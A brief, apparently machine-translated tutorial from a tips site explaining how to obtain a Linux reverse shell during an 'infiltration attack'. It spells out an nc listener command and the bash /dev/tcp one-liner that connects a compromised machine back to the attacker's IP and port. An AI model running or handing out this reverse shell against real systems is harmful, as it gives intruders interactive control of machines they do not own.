How Linux uses commands to generate bounce SHELL

  
                  [Reverse shell] is also called the rebound shell. It is the basic function of the infiltration attack. If you find the opportunity for the remote machine to execute the code you injected, how can your code generate an interactive shell for you? You can start a listener process [nc -l port number] with nc locally and then execute [bash -i >& /dev/tcp/your local IP/port number0>&1] at the remote end. can.
Copyright © Windows knowledge All Rights Reserved